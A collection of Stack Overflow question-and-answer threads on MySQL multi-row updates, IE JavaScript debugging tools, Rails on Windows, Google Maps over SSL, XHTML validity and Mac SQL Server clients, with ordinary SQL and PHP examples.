I just created a table, put a full text index on the table and did a couple of test searches and didn't have a problem, so wildcard searching works as intended.
[Update]
I see that you've updated your question and know that you need to use one of the functions.
You can still search with the wildcard at the beginning, but if the word is not a full word following the wildcard, you have to add another wildcard at the end.
Example: "*ildcar" will look for a single word as long as it ends with "ildcar".
Example: "*ildcar*" will look for a single word with "ildcar" in the middle, which means it will match "wildcard". [Just noticed that Markdown removed the wildcard characters from the beginning and ending of my quoted string here.]
[Update #2]
Dave Ward - Using a wildcard with one of the functions shouldn't be a huge perf hit. If I created a search string with just "*", it will not return all rows, in my test case, it returned 0 records.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3400",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "50"
} |
Q: JavaScript Troubleshooting Tools in Internet Explorer I use Firebug and the Mozilla JS console heavily, but every now and then I run into an IE-only JavaScript bug, which is really hard to locate (ex: error on line 724, when the source HTML only has 200 lines).
I would love to have a lightweight JS tool (a la firebug) for Internet Explorer, something I can install in seconds on a client's PC if I run into an error and then uninstall. Some Microsoft tools take some serious download and configuration time.
Any ideas?
A: I would recommend Companion JS.
This is the free version of Debug Bar but I find it easier to use and have the features I need. Great to test little JavaScript snippets in IE the same way I do with Firebug in Firefox.
EDIT 5 years later: I now uses Internet Explorer integrated developer tools.
A: IE 8 is supposed to have better tools, but the IE Developer Toolbar is pretty good.
A: You might find Firebug Lite useful for that.
Its bookmarklet should be especially useful when debugging on a user's machine.
A: I use both Microsoft Script Debugger and FireBug Lite, depending on what I am debugging. Both are great tools- try them both out and stich with what you're comfortable with.
A: Since Internet Explorer 8, IE has been shipping with a pretty impressive set of tools for JavaScript debugging, profiling, and more. Like most other browsers, the developer tools are accessible by pressing F12 on your keyboard.
Script Tab
The Script tab is likely what you'll be interested in, though the Console, Profiler, and Network tabs get plenty of use as well while debugging applications.
From the Script tab you can:
*
*Format JavaScript to make it more readable
*Move from source to source of various resources on the page
*Insert breakpoints
*Move in and over lines of code while stepping through its execution
*Watch variables
*Inspect the call stack to see how code was executed
*Toggle breakpoints
*and more...
Console Tab
The console tab is great for when you need to execute some arbitrary code against the application. I use this to check the return of certain methods, or even to quickly test solutions for answers on Stack Overflow.
Profiler Tab
The profile is awesome if you're looking for long-running processes, or trying to optimize your code to run smoother or make fewer calls to resource-intensive methods. Open up any page and click "Start profiling" from the Profiler tab to start recording.
While the profiler is working, you can move about the page, performing common actions. When you feel you've recorded enough, hit "Stop profiling." You will then be shown a summary of all functions ran, or a call tree. You can quickly sort this data by various columns:
Network Tab
The network tab will record traffic on your site/application. It's very handy for finding files that aren't being downloaded, hanging, or for tracking data that is being requested asynchronously.
Within this tab you can also move between a Summary view and a Detailed view. Within the Detailed view you can inspect headers sent with requests, and responses. You can view cookie information, check the timing of events, and more.
I'm not really doing the IE Developer Tools justice - there is a lot of uncovered ground. I would encourage you to check them out though, and make them a part of your development.
A: In IE8 just press F12!
A: *
*Go to Tools->Internet Options…->Advanced->Enable Script Debugging (Internet Explorer)
then attach Visual Studio Debugger when an error occurs.
If you're using IE 8, install the developer toolbar because it has a built in debugger.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3404",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "44"
} |
Q: Ruby On Rails with Windows Vista - Best Setup? What do you think is the best set-up for RoR in a Win Vista environment? I've tried the radrails eclipse plug-in, and it just seemed too bulky for me, I've also started to just use Textpad and the command line, but I'm used to having somewhat of an IDE to work with.
A: e-texteditor seems to be growing as the editor of choice for rails development on ruby. Too bad it isn't free.
Aside from that, the RailsOnWindows guide works fine. And Sqlite is by far your best choice for development: RailsWithSqlite
A: NetBeans is definitely recommended if you like IDEs. It has a lot of Ruby features and there's a Ruby only download.
A: There probably isn't a definitive "right" answer - it's going to depend on how you like to develop.
However, it's interesting to note that most of the "name" Rails folk seem to use Textmate on their Macs. So a fairly powerful editor rather than an IDE. I suspect this is at least in part because of the fairly strong TDD bias within the Rails community - not so much debugging being necessary because they're working in small test-driven steps. That's the theory anyway.
The closest analog to Textmate in Windows seems to be e. It costs, but a fairly trivial amount (pocket-money, if we're honest). There's a 30-day free evaluation available too.
I've used Scite for much of my Ruby/Rails work, don't discard it just because it's the "default" - there's a reason why it was chosen for inclusion.
As for IDEs, I couldn't get anything to work in Eclipse, NetBeans seems quite good and I tried the beta of Sapphire in Steel, also pretty slick. I just don't seem to want to work in an IDE; the opposite of how I feel about working in C#, strangely enough.
A: Are you just looking for an IDE, or a full stack (IDE, source control, database, web server)?
If just an IDE, I would recommend NetBeans or RadRails. Both have syntax highlighting, code help, support for Rails projects, code completion, and basically everything else you would expect to find in a full-featured IDE. Both are also completely free. Of course, both suffer from the "bulky" problem that you identify.
If a full stack, I would recommend Subversion, MySql, and Mongrel. These three are all very simple and well-supported in Windows.
A: Seconded for e-texteditor. I use it daily and it's great (although not without it's share of BUGS).
For the rails side of things though, I'd actually suggest a virtual machine running linux.
Ubuntu works well, the only caveat is that you have to install rubygems manually, as it does not adhere to the great debian filesystem naming ideology :-(
I suggest this because if you want to do "advanced" things, such as installing ImageMagick/RMagick, or memcached, or a number of other plugins which require native C libraries, it becomes very painful very quickly if you're on windows.
A second reason is that unless you are very atypical, your production server will likely be running linux too. It's good practice to have your development environment match your deployment environment as closely as possible, to help you find and fix bugs earlier and more easily, and avoid fixing bugs that won't affect your production site (like windows specific ones)
Microsoft Virtual PC and VMWare both have free options, which work well, and are plenty fast, so this is not a problem.
A: I don't know about "best", because that's a subjective question, but I can tell you what setup I use and recommend:
Editor: E Text Editor
TextMate seems to be the editor of choice for Rails on Mac. E Text Editor is essentially TextMate for Windows. Its bundles are broadly compatible with TextMate's including the Rails 2 bundle which is included with the basic install.
Alternatively, if you're into the whole Visual Studio ecosystem, then Ruby in Steel PE might be a better bet. It's a really nice all-in-one package that actually comes with (a stripped-down version of) Visual Studio now.
Environment: VirtualBox running Ubuntu Server
Deploying a Rails app can be a pain at the best of times; deploying a Rails app from a Windows environment onto a *nix server is even worse. Plus, running Rails apps on Windows is slow. Running your tests is slow. So I use VirtualBox to host a VM on my Windows machine that mirrors my target deployment environment as closely as possible. In my case I run Ubuntu Server because there are a really nice set of step-by-step tutorials for getting up-and-running with a full Ubuntu-based Rails stack on the SliceHost wiki.
Here are the benefits of developing using a VM:
*
*I map a network drive to the VM so that I can edit the code on it directly from Windows using E Text Editor. The VM acts and feels just like a command line window. So you don't feel like you're in a completely alien environment.
*It runs Rails and other Ruby scripts (like tests) faster than running it natively in Windows
*Everything is contained and snapshottable, so I can experiment and generally play around without worrying about breaking anything. If something does break, I just roll back to a previous good state.
*It uses hardly any RAM. It will typically use less that 100MB (it's currently using ~43MB, but I don't have a Rails app spun-up). Contrast this with, say, Firefox which will typically be hogging >200MB and you realize that running a Linux-based VM like this is amazingly efficient.
*I can move my environment between machines
*I have much more robust deployment workflow
*I can limit the VM to have exactly the same amount of RAM as the server I'll be hosting on. E.g., if I'm to be using a SliceHost 256MB slice, I would limit the RAM to 256MB.
*I can build a seperate environment for different hosts. If I wanted to host on Joyent, for example, I could build an Open Solaris VM
*Gems and other binaries won't need recompiling for your target environment
*It's "a good thing"™ to get to grips with the environment your Rails app is likely to be running on. Seeing as most, if not all, commercial Rails hosts run some sort of *nix derivative, you're going to want to be comfortable with the *nix environment.
A: Instant Rails is a good way to get started quick.
I can verify that it works well on Vista.
A: I suggest you install Ruby first.
Then install Rails.
Then download Aptana and install it.
After that you can install RadRails from Aptana's start page.
Please refer to "Aptana Radrails: An Ide for Rails Development" published by Packt publishing when using RadRails.
A: You might want to take a look at this:
http://www.sapphiresteel.com/
There's a free personal edition too
(Updated: Assuming that you already have Visual Studio Full Fat Edition)
A: I am one of the contributors to Rubystack is a free, all-in-one installer for Windows that installs Apache, MySQL, Ruby, Rails and all other third-party libraries typically used on a development environment (such as Imagemagick). You may want to give it a try
A: RubyMine 3-4 + (RubyInstaller, DevKit for building gems, Postgres, msys git)
works perfect for me on Windows 7 as a development platform.
Well, except the problem that ruby is very SLOW with rails on windows.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3408",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "17"
} |
Q: Multiple Updates in MySQL I know that you can insert multiple rows at once, is there a way to update multiple rows at once (as in, in one query) in MySQL?
Edit:
For example I have the following
Name id Col1 Col2
Row1 1 6 1
Row2 2 2 3
Row3 3 9 5
Row4 4 16 8
I want to combine all the following Updates into one query
UPDATE table SET Col1 = 1 WHERE id = 1;
UPDATE table SET Col1 = 2 WHERE id = 2;
UPDATE table SET Col2 = 3 WHERE id = 3;
UPDATE table SET Col1 = 10 WHERE id = 4;
UPDATE table SET Col2 = 12 WHERE id = 4;
A: The question is old, yet I'd like to extend the topic with another answer.
My point is, the easiest way to achieve it is just to wrap multiple queries with a transaction. The accepted answer INSERT ... ON DUPLICATE KEY UPDATE is a nice hack, but one should be aware of its drawbacks and limitations:
*
*As being said, if you happen to launch the query with rows whose primary keys don't exist in the table, the query inserts new "half-baked" records. Probably it's not what you want
*If you have a table with a not null field without default value and don't want to touch this field in the query, you'll get "Field 'fieldname' doesn't have a default value" MySQL warning even if you don't insert a single row at all. It will get you into trouble, if you decide to be strict and turn mysql warnings into runtime exceptions in your app.
I made some performance tests for three of suggested variants, including the INSERT ... ON DUPLICATE KEY UPDATE variant, a variant with "case / when / then" clause and a naive approach with transaction. You may get the python code and results here. The overall conclusion is that the variant with case statement turns out to be twice as fast as two other variants, but it's quite hard to write correct and injection-safe code for it, so I personally stick to the simplest approach: using transactions.
Edit: Findings of Dakusan prove that my performance estimations are not quite valid. Please see this answer for another, more elaborate research.
A: Not sure why another useful option is not yet mentioned:
UPDATE my_table m
JOIN (
SELECT 1 as id, 10 as _col1, 20 as _col2
UNION ALL
SELECT 2, 5, 10
UNION ALL
SELECT 3, 15, 30
) vals ON m.id = vals.id
SET col1 = _col1, col2 = _col2;
A: Yes, that's possible - you can use INSERT ... ON DUPLICATE KEY UPDATE.
Using your example:
INSERT INTO table (id,Col1,Col2) VALUES (1,1,1),(2,2,3),(3,9,3),(4,10,12)
ON DUPLICATE KEY UPDATE Col1=VALUES(Col1),Col2=VALUES(Col2);
A: Why does no one mention multiple statements in one query?
In php, you use multi_query method of mysqli instance.
From the php manual
MySQL optionally allows having multiple statements in one statement string. Sending multiple statements at once reduces client-server round trips but requires special handling.
Here is the result comparing to other 3 methods in update 30,000 raw. Code can be found here which is based on answer from @Dakusan
Transaction: 5.5194580554962
Insert: 0.20669293403625
Case: 16.474853992462
Multi: 0.0412278175354
As you can see, multiple statements query is more efficient than the highest answer.
If you get error message like this:
PHP Warning: Error while sending SET_OPTION packet
You may need to increase the max_allowed_packet in mysql config file which in my machine is /etc/mysql/my.cnf and then restart mysqld.
A: All of the following applies to InnoDB.
I feel knowing the speeds of the 3 different methods is important.
There are 3 methods:
*
*INSERT: INSERT with ON DUPLICATE KEY UPDATE
*TRANSACTION: Where you do an update for each record within a transaction
*CASE: In which you a case/when for each different record within an UPDATE
I just tested this, and the INSERT method was 6.7x faster for me than the TRANSACTION method. I tried on a set of both 3,000 and 30,000 rows.
The TRANSACTION method still has to run each individually query, which takes time, though it batches the results in memory, or something, while executing. The TRANSACTION method is also pretty expensive in both replication and query logs.
Even worse, the CASE method was 41.1x slower than the INSERT method w/ 30,000 records (6.1x slower than TRANSACTION). And 75x slower in MyISAM. INSERT and CASE methods broke even at ~1,000 records. Even at 100 records, the CASE method is BARELY faster.
So in general, I feel the INSERT method is both best and easiest to use. The queries are smaller and easier to read and only take up 1 query of action. This applies to both InnoDB and MyISAM.
Bonus stuff:
The solution for the INSERT non-default-field problem is to temporarily turn off the relevant SQL modes: SET SESSION sql_mode=REPLACE(REPLACE(@@SESSION.sql_mode,"STRICT_TRANS_TABLES",""),"STRICT_ALL_TABLES",""). Make sure to save the sql_mode first if you plan on reverting it.
As for other comments I've seen that say the auto_increment goes up using the INSERT method, this does seem to be the case in InnoDB, but not MyISAM.
Code to run the tests is as follows. It also outputs .SQL files to remove php interpreter overhead
<?php
//Variables
$NumRows=30000;
//These 2 functions need to be filled in
function InitSQL()
{
}
function RunSQLQuery($Q)
{
}
//Run the 3 tests
InitSQL();
for($i=0;$i<3;$i++)
RunTest($i, $NumRows);
function RunTest($TestNum, $NumRows)
{
$TheQueries=Array();
$DoQuery=function($Query) use (&$TheQueries)
{
RunSQLQuery($Query);
$TheQueries[]=$Query;
};
$TableName='Test';
$DoQuery('DROP TABLE IF EXISTS '.$TableName);
$DoQuery('CREATE TABLE '.$TableName.' (i1 int NOT NULL AUTO_INCREMENT, i2 int NOT NULL, primary key (i1)) ENGINE=InnoDB');
$DoQuery('INSERT INTO '.$TableName.' (i2) VALUES ('.implode('), (', range(2, $NumRows+1)).')');
if($TestNum==0)
{
$TestName='Transaction';
$Start=microtime(true);
$DoQuery('START TRANSACTION');
for($i=1;$i<=$NumRows;$i++)
$DoQuery('UPDATE '.$TableName.' SET i2='.(($i+5)*1000).' WHERE i1='.$i);
$DoQuery('COMMIT');
}
if($TestNum==1)
{
$TestName='Insert';
$Query=Array();
for($i=1;$i<=$NumRows;$i++)
$Query[]=sprintf("(%d,%d)", $i, (($i+5)*1000));
$Start=microtime(true);
$DoQuery('INSERT INTO '.$TableName.' VALUES '.implode(', ', $Query).' ON DUPLICATE KEY UPDATE i2=VALUES(i2)');
}
if($TestNum==2)
{
$TestName='Case';
$Query=Array();
for($i=1;$i<=$NumRows;$i++)
$Query[]=sprintf('WHEN %d THEN %d', $i, (($i+5)*1000));
$Start=microtime(true);
$DoQuery("UPDATE $TableName SET i2=CASE i1\n".implode("\n", $Query)."\nEND\nWHERE i1 IN (".implode(',', range(1, $NumRows)).')');
}
print "$TestName: ".(microtime(true)-$Start)."<br>\n";
file_put_contents("./$TestName.sql", implode(";\n", $TheQueries).';');
}
A: There is a setting you can alter called 'multi statement' that disables MySQL's 'safety mechanism' implemented to prevent (more than one) injection command. Typical to MySQL's 'brilliant' implementation, it also prevents user from doing efficient queries.
Here (http://dev.mysql.com/doc/refman/5.1/en/mysql-set-server-option.html) is some info on the C implementation of the setting.
If you're using PHP, you can use mysqli to do multi statements (I think php has shipped with mysqli for a while now)
$con = new mysqli('localhost','user1','password','my_database');
$query = "Update MyTable SET col1='some value' WHERE id=1 LIMIT 1;";
$query .= "UPDATE MyTable SET col1='other value' WHERE id=2 LIMIT 1;";
//etc
$con->multi_query($query);
$con->close();
Hope that helps.
A: You can alias the same table to give you the id's you want to insert by (if you are doing a row-by-row update:
UPDATE table1 tab1, table1 tab2 -- alias references the same table
SET
col1 = 1
,col2 = 2
. . .
WHERE
tab1.id = tab2.id;
Additionally, It should seem obvious that you can also update from other tables as well. In this case, the update doubles as a "SELECT" statement, giving you the data from the table you are specifying. You are explicitly stating in your query the update values so, the second table is unaffected.
A: You may also be interested in using joins on updates, which is possible as well.
Update someTable Set someValue = 4 From someTable s Inner Join anotherTable a on s.id = a.id Where a.id = 4
-- Only updates someValue in someTable who has a foreign key on anotherTable with a value of 4.
Edit: If the values you are updating aren't coming from somewhere else in the database, you'll need to issue multiple update queries.
A: No-one has yet mentioned what for me would be a much easier way to do this - Use a SQL editor that allows you to execute multiple individual queries. This screenshot is from Sequel Ace, I'd assume that Sequel Pro and probably other editors have similar functionality. (This of course assumes you only need to run this as a one-off thing rather than as an integrated part of your app/site).
A: Since you have dynamic values, you need to use an IF or CASE for the columns to be updated. It gets kinda ugly, but it should work.
Using your example, you could do it like:
UPDATE table SET Col1 = CASE id
WHEN 1 THEN 1
WHEN 2 THEN 2
WHEN 4 THEN 10
ELSE Col1
END,
Col2 = CASE id
WHEN 3 THEN 3
WHEN 4 THEN 12
ELSE Col2
END
WHERE id IN (1, 2, 3, 4);
A: UPDATE table1, table2 SET table1.col1='value', table2.col1='value' WHERE table1.col3='567' AND table2.col6='567'
This should work for ya.
There is a reference in the MySQL manual for multiple tables.
A: Use a temporary table
// Reorder items
function update_items_tempdb(&$items)
{
shuffle($items);
$table_name = uniqid('tmp_test_');
$sql = "CREATE TEMPORARY TABLE `$table_name` ("
." `id` int(10) unsigned NOT NULL AUTO_INCREMENT"
.", `position` int(10) unsigned NOT NULL"
.", PRIMARY KEY (`id`)"
.") ENGINE = MEMORY";
query($sql);
$i = 0;
$sql = '';
foreach ($items as &$item)
{
$item->position = $i++;
$sql .= ($sql ? ', ' : '')."({$item->id}, {$item->position})";
}
if ($sql)
{
query("INSERT INTO `$table_name` (id, position) VALUES $sql");
$sql = "UPDATE `test`, `$table_name` SET `test`.position = `$table_name`.position"
." WHERE `$table_name`.id = `test`.id";
query($sql);
}
query("DROP TABLE `$table_name`");
}
A: And now the easy way
update my_table m, -- let create a temp table with populated values
(select 1 as id, 20 as value union -- this part will be generated
select 2 as id, 30 as value union -- using a backend code
-- for loop
select N as id, X as value
) t
set m.value = t.value where t.id=m.id -- now update by join - quick
A: Yes ..it is possible using INSERT ON DUPLICATE KEY UPDATE sql statement..
syntax:
INSERT INTO table_name (a,b,c) VALUES (1,2,3),(4,5,6)
ON DUPLICATE KEY UPDATE a=VALUES(a),b=VALUES(b),c=VALUES(c)
A: use
REPLACE INTO`table` VALUES (`id`,`col1`,`col2`) VALUES
(1,6,1),(2,2,3),(3,9,5),(4,16,8);
Please note:
*
*id has to be a primary unique key
*if you use foreign keys to
reference the table, REPLACE deletes then inserts, so this might
cause an error
A: I took the answer from @newtover and extended it using the new json_table function in MySql 8. This allows you to create a stored procedure to handle the workload rather than building your own SQL text in code:
drop table if exists `test`;
create table `test` (
`Id` int,
`Number` int,
PRIMARY KEY (`Id`)
);
insert into test (Id, Number) values (1, 1), (2, 2);
DROP procedure IF EXISTS `Test`;
DELIMITER $$
CREATE PROCEDURE `Test`(
p_json json
)
BEGIN
update test s
join json_table(p_json, '$[*]' columns(`id` int path '$.id', `number` int path '$.number')) v
on s.Id=v.id set s.Number=v.number;
END$$
DELIMITER ;
call `Test`('[{"id": 1, "number": 10}, {"id": 2, "number": 20}]');
select * from test;
drop table if exists `test`;
It's a few ms slower than pure SQL but I'm happy to take the hit rather than generate the sql text in code. Not sure how performant it is with huge recordsets (the JSON object has a max size of 1Gb) but I use it all the time when updating 10k rows at a time.
A: UPDATE `your_table` SET
`something` = IF(`id`="1","new_value1",`something`), `smth2` = IF(`id`="1", "nv1",`smth2`),
`something` = IF(`id`="2","new_value2",`something`), `smth2` = IF(`id`="2", "nv2",`smth2`),
`something` = IF(`id`="4","new_value3",`something`), `smth2` = IF(`id`="4", "nv3",`smth2`),
`something` = IF(`id`="6","new_value4",`something`), `smth2` = IF(`id`="6", "nv4",`smth2`),
`something` = IF(`id`="3","new_value5",`something`), `smth2` = IF(`id`="3", "nv5",`smth2`),
`something` = IF(`id`="5","new_value6",`something`), `smth2` = IF(`id`="5", "nv6",`smth2`)
// You just building it in php like
$q = 'UPDATE `your_table` SET ';
foreach($data as $dat){
$q .= '
`something` = IF(`id`="'.$dat->id.'","'.$dat->value.'",`something`),
`smth2` = IF(`id`="'.$dat->id.'", "'.$dat->value2.'",`smth2`),';
}
$q = substr($q,0,-1);
So you can update hole table with one query
A: UPDATE tableName SET col1='000' WHERE id='3' OR id='5'
This should achieve what you'r looking for. Just add more id's. I have tested it.
A: The following will update all rows in one table
Update Table Set
Column1 = 'New Value'
The next one will update all rows where the value of Column2 is more than 5
Update Table Set
Column1 = 'New Value'
Where
Column2 > 5
There is all Unkwntech's example of updating more than one table
UPDATE table1, table2 SET
table1.col1 = 'value',
table2.col1 = 'value'
WHERE
table1.col3 = '567'
AND table2.col6='567'
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3432",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "444"
} |
Q: Options for Google Maps over SSL We recently discovered that the Google Maps API does not play nicely with SSL. Fair enough, but what are some options for overcoming this that others have used effectively?
Will the Maps API work over SSL (HTTPS)?
At this time, the Maps API is not
available over a secure (SSL)
connection. If you are running the
Maps API on a secure site, the browser
may warn the user about non-secure
objects on the screen.
We have considered the following options
*
*Splitting the page so that credit card collection (the requirement for SSL) is not on the same page as the Google Map.
*Switching to another map provider, such as Virtual Earth. Rumor has it that they support SSL.
*Playing tricks with IFRAMEs. Sounds kludgy.
*Proxying the calls to Google. Sounds like a lot of overhead.
Are there other options, or does anyone have insight into the options that we have considered?
A: Just to add to this
http://googlegeodevelopers.blogspot.com/2011/03/maps-apis-over-ssl-now-available-to-all.html
Haven't tried migrating my SSL maps (ended up using Bing maps api) back to Google yet but might well be on the cards.
A: This seems like a buisness requirements/usability issue - do you have a good reason for putting the map on the credit card page? If so, maybe it's worth working through some technical problems.
You might try using Mapstraction, so you can switch to a provider that supports SSL, and switch back to Google if they support it in the future.
A: I would go with your first solution. This allows the user to focus on entering their credit card details.
You can then transfer them to another webpage which asks or provides them further information relating to the Google Map.
A: If you are a Google Maps API Premier customer, then SSL is supported. We use this and it works well.
Prior to Google making SSL available, we proxyed all the traffic and this worked acceptably. You lose the advantage of Google's CDN when you use this approach and you may get your IP banned since it will appear that you are generating a lot of traffic.
A: I'd agree with the previous two answers that in this instance it may be better from a usability perspective to split the two functions into separate screens. You really want your users to be focussed on entering complete and accurate credit card information, and having a map on the same screen may be distracting.
For the record though, Virtual Earth certainly does fully support SSL. To enable it you simple need to change the script reference from http:// to https:// and append &s=1 to the URL, e.g.
<script src="http://dev.virtualearth.net/mapcontrol/mapcontrol.ashx?v=6.1" type="text/javascript"></script>
becomes
<script src="https://dev.virtualearth.net/mapcontrol/mapcontrol.ashx?v=6.1&s=1" type="text/javascript"></script>
A: If you are getting SECURITY ALERT on IE 9 while displaying Google maps, use
<script src="https://maps.google.com/maps?file=api&v=2&hl=en&tab=wl&z=6&sensor=true&key=<?php echo $key;?>
" type="text/javascript"></script>
instead of
<script src="https://maps.googleapis.com/maps/api/js?key=YOUR_API_KEY&sensor=SET_TO_TRUE_OR_FALSE"
type="text/javascript"></script>
A: I 've just removed the http protocol and it worked!
From this:
<script src="http://maps.google.com/maps/api/js?sensor=true" type="text/javascript"></script>
To this:
<script src="//maps.google.com/maps/api/js?sensor=true" type="text/javascript"></script>
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3437",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "20"
} |
Q: Is it acceptable for invalid XHTML? I've noticed a lot of sites, SO included, use XHTML as their mark-up language and then fail to adhere to the spec. Just browsing the source for SO there are missing closing tags for paragraphs, invalid elements, etc.
So should tools (and developers) use the XHTML doctype if they are going to produce invalid mark up? And should browsers be more firm in their acceptance of poor mark-up?
And before anyone shouts hypocrite, my blog has one piece of invalid mark-up involving the captha (or it did the last time I checked) which involves styling the noscript tag.
A: We should always try to make it validate according to standards. We'll be sure that the website will display and work fine on current browsers AND future browsers.
A: I don't think that, if you specify a doctype, there is any reason not to adhere to this doctype.
Using XHTML makes automated error detection easy, every change can be automatically checked for invalid markup. This prevents errors, especially when using automatically generated content. It is really easy for a web developer using a templating engine (JSP, ASP.NET StringTemplate, etcetera) to copy/paste one closing tag too little or too many. When this is your only error, it can be detected and fixed immediately. I once worked for a site that had 165 validation errors per page, of which 2 or 3 were actual bugs. These were hard to find in the clutter of other errors. Automatic validation would have prevented these errors at the source.
Needless to say, choosing a standard and sticking to it can never benefit interoperability with other systems (screen scrapers, screen readers, search engines) and I have never come across a situation where a valid semantic XHTML with CSS solution wasn't possible for all major browsers.
Obviously, when working with complex systems, it's not always possible to stick to your doctype, but this is mostly a result of improper communication between the different teams developing different parts of these systems, or, most likely, legacy systems. In the last case it's probably better to isolate these cases and change your doctype accordingly.
It's good to be pragmatic and not adhere to XHTML just because someone said so, regardless of costs, but with current knowledge about CSS and browsers, testing and validation tools, most of the time the benefits are much greater than the costs.
A: You can say that I have an OCD on XHTML validity. I find that most of the problems with the code not being valid comes from programmers not knowing the difference between HTML and XHTML. I've been writing 100% valid XHTML and CSS or a while now and have never had any major rendering problems with other browsers. If you keep everything valid, and don't try anything too exotic css wise, you will save yourself a ton of time in fixes.
A: There are many reasons to use valid markup. My favorite is that it allows you to use validation as a form of regression testing, preventing the markup equivalent of "delta rot" from leading to real rendering problems once the errors reach some critical mass. And really, it's just plain sloppy to allow "lazy" errors like typos and mis-nested/unclosed tags to accumulate. Valid markup is one way to identify passionate programmers.
There's also the issue of debugging: valid markup also gives you a stable baseline from which to work on the inevitable cross-browser compatibility woes. No web developer who values his time should begin debugging browser compatibility problems without first ensuring that the markup is at least syntactically valid—and any other invalid markup should have a good reason for being there.
(Incidentally, stackoverflow.com fails both these tests, and suggestions to fix the problems were declined.)
All of that said, to answer your specific question, it's probably not worthwhile to use one of the XHTML doctypes unless you plan to produce valid (or at least well-formed) markup. XHTML's primary advantages are derived from the fact that XHTML is XML, allowing it to be processed and transformed by tools and technologies that work with XML. If you don't plan to make your XHTML well-formed XML, then there's little point in choosing that doctype. The latest HTML 4 spec will probably do everything you need, and it's much more forgiving.
A: I wouldn't use XHTML at all just to save myself the philosophical stress. It's not like any browsers are treating it like XHTML anyway.
Browsers will reject poor mark-up if the page is sent as application/xhtml+xml, but they rarely are. This is fine.
I would be more concerned about things like inline use of CSS and JavaScript with Stack Overflow, just because they make maintenance harder.
A: Though I believe in striving for valid XHTML and CSS, it's often hard to do for a number of reasons.
*
*First, some of the content could be loaded via AJAX. Sometimes, fragments are not properly inserted into the existing DOM.
*The HTML that you are viewing may not have all been produced in the same document. For example, the page could be made of up components, or templates, and then thrown together right before the browser renders it. This isn't an excuse, but you can't assume that the HTML you're seeing was hand coded all at once.
*What if some of the code generated by Markdown is invalid? You can't blame Stack Overflow for not producing valid code.
*Lastly, the purpose of the DOCTYPE is not to simply say "Hey, I'm using valid code" but it's also to give the browser a heads up what you're trying to do so that it can at least come close to correctly parsing that information.
I don't think that most developers specify a DOCTYPE and then explicitly fail to adhere to it.
A: while I agree with the sentiment of "if it renders fine then don't worry about it" statement, however it's good for follow a standard, even though it may not be fully supported right now. you can still use Table for layout, but it's not good for a reason.
A: No, you should not use XHTML if you can't guarantee well-formedness, and in practice you can't guarantee it if you don't use XML serializer to generate markup. Read about producing XML.
Well-formedness is the thing that differentiates XHTML from HTML. XHTML with "just one" markup error ceases to be XHTML. It has to be perfect every time.
If "XHTML" site appears to work with some errors, it's because browsers ignore the DOCTYPE and interpret page as HTML.
See XHTML proxy that forces interpretation of pages as XHTML. Most of the time they fail miserably. This is one of the reason why future of XHTML is uncertain and why development of HTML has been resumed.
A: It depends. I had that issue with my blog where a YouTube video caused invalid XHTML, but it rendered fine. On the other hand, I have a "Valid XHTML" link, and a combination of a "Valid XHTML" claim and invalid XHTML is not professional.
As SO does not claim to be valid, I think it's acceptable, but personally if I were Jeff i would be bothered and try to fix it even if it looks good in modern browsers, but some people rather just move on and actually get things done instead of fixing non-existent bugs.
A: So long as it works in IE, FF, Safari, (insert other browser here) you should be okay. Validation isn't as important as having it render correctly in multiple browsers. Just because it is valid, doesn't mean it'll work in IE properly, for instance.
Run Google Analytics or similar on your site and see what kind of browsers your users are using and then judge which browsers you need to support the most and worry about the less important ones when you have the spare time to do so.
A: I say, if it renders OK, then it doesn't matter if it's pixel perfect.
It takes a while to get a site up and running the way you want it, going back and making changes is going to change the way the page renders slightly, then you have to fix those problems.
Now, I'm not saying you should built sloppy web pages, but I see no reason to fix what ain't broke. Browsers aren't going to drop support for error correction anytime in the near future.
A: I don't understand why everyone get caught up trying to make their websites fit the standard when some browsers sill have problems properly rendering standard code. I've been in web design for something like 10 years and I stopped double codding (read: hacking css), and changing stupid stuff just so I could put a button on my site.
I believe that using a < div> will cause you to be invalid regardless, and it get a bit harder to do any major JavaScript/AJAX without it.
A: There are so many standards and they are so badly "enforced" or supported that I don't think it matters. Don't get me wrong, I think there should be standards but because they are not enforced, nobody follows them and it's a massive downward spiral.
A: For 99.999% of the sites out there, it really won't matter. The only time I've had it matter, I ran the HTML input through HTMLTidy to XHTML-ize it, and then ran my processing on it.
Pretty much, it's the old programmer's axiom: trust no input.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3448",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "21"
} |
Q: SQL Client for Mac OS X that works with MS SQL Server How can I connect to a remote SQL server using Mac OS X? I don't really need a GUI, but it would be nice to have for the color coding and resultset grid. I'd rather not have to use a VM.
Is there a SQL client for Mac OS X that works with MS SQL Server?
A: When this question was asked there were very few tools out there were worth much. I also ended up using Fusion and a Windows client. I have tried just about everything for MAC and Linux and never found anything worthwhile. That included dbvisualizer, squirrel (particularly bad, even though the windows haters in my office swear by it), the oracle SQL developer and a bunch of others.
Nothing compared to DBArtizan on Windows as far as I was concerned and I was prepared to use it with Fusion or VirtualBox. I don't use the MS product because it is only limited to MS SQL.
Bottom line is nothing free is worthwhile, nor were most commercial non windows products
However, now (March 2010) I believe there are two serious contenders and worthwhile versions for the MAC and Linux which have a low cost associated with them. The first one is Aqua Data Studio which costs about $450 per user, which is a barely acceptable, but cheap compared to DBArtizan and others with similar functionality (but MS only). The other is RazorSQL which only costs $69 per user.
Aqua data studio is good, but a resource hog and basically pretty sluggish and has non essential features such as the ER diagram tool, which is pretty bad at that. The Razor is lightning fast and is only a 16meg download and has everything an SQL developer needs including a TSQL editor.
So the big winner is RazorSQL and for $69, well worth it and feature ridden. Believe me, after several years of waiting to find a cheap non windows substitute for DBartizan, I have finally found one and I have been very picky.
A: My employer produces a simple, proof-of-concept HTML5-based SQL client which can be used against any ODBC data source on the web-browser host machine, through the HTML5 WebDB-to-ODBC Bridge we also produce. These components are free, for Mac, Windows, and more.
